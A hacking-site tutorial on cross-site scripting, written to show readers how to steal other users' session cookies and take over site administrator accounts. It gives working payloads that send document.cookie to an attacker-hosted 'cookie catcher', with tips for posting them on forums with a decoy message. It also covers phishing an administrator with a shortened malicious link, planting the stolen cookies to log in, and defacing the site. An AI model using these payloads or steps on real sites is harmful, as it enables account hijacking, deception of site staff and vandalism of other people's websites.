Welcome to HackeRoyale.

XSS Tutorial : Complete Cross-Site Scripting Guide

XSS Tutorial : Complete Cross-Site Scripting Guide | HackeRoyale

Complete XSS Tutorial

XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.

Question will be that why we would need someone else’s cookie?

The answer is that we can change our browser’s cookies to login as them!!! So lets call it Session Hijacking

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm

What does the cookie catcher do?

It grabs the user’s:

  1. Cookies
  2. IP
  3. Referral link which what page it got to that link
  4. Time and Date

Get Vulnerable sites

Ok first we need sites that are vulnerable to XSS so it will work on them.

To test it we will need to add a code after the link.

Now for testing if a site is vuln or not you can add these codes:









Or a new one which I found out myself which you can inject HTML:


"><body bgcolor="FF0000"></body>


"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:

Or if you used my testing and you saw the page’s background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be:


Persistent XSS

In this method we will grab the victim’s cookies with no suspicion and completely stealth.

Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.

Now test and see if the XSS vulnerable test’s work on it.
It it does, you are getting one of the vulnerability’s symptoms. So now lets try to grab it’s cookies. If there is a box to type and submit it, add this:


<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???

So they wont suspect you! 😉

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be:

http://www.example.com/cookie catcher.php

The container of the cookies would be:


Now visit cookies.html and you would see the session of that cookie!

Now there is another way for a cookie grabbing drive by, add this code and post it:


<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=”www.you.110 mb.com/cookie catcher.php?c=” + document.cookie)</iframe>

Then post it in the forum or the comment box.

Now this will open a iframe in the page which will allow you to have the same page in that website. If you don’t know about iframes make a new html file in your computer and just do a <iframe src=”www.google.com”></iframe> and you will understand iframes more..

Of course, the site needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS

Ok in this method we will make the victim admin go to our link. First we will pick an XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:



and click the Search button. If you see a JavaScript popup means its vulnerable to Non-Persistent XSS attack.

Ok now, we will do something similar.

Now in front of the search.php?search= add this:


"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.tinyurl.com and shrink the whole page’s link. Try to find a site administrator’s E-mail in that vulnerable website and send a Fake mail!

Now in the body just tell something fake like:

Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. So the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.

Session Hijacking

Ok now, you have the admin’s cookies either way, so we need to edit our own browser’s cookies. First go to that page’s admin login or its main page and delete ALL of your cookies from that page.

Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad.

The ; separates cookies from each other so first copy the code before the ; .

Now go in that vulnerable website and clear the link. Instead add this:



or for an example:


Javascript:void(document.cookie="__utma=255621336. 1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! You are logged in as administrator!

So now go in your admin panel and upload your deface page.

Good luck now you hacked a site with XSS


featured posts


Get weekly updates by subscribing to our newsletter.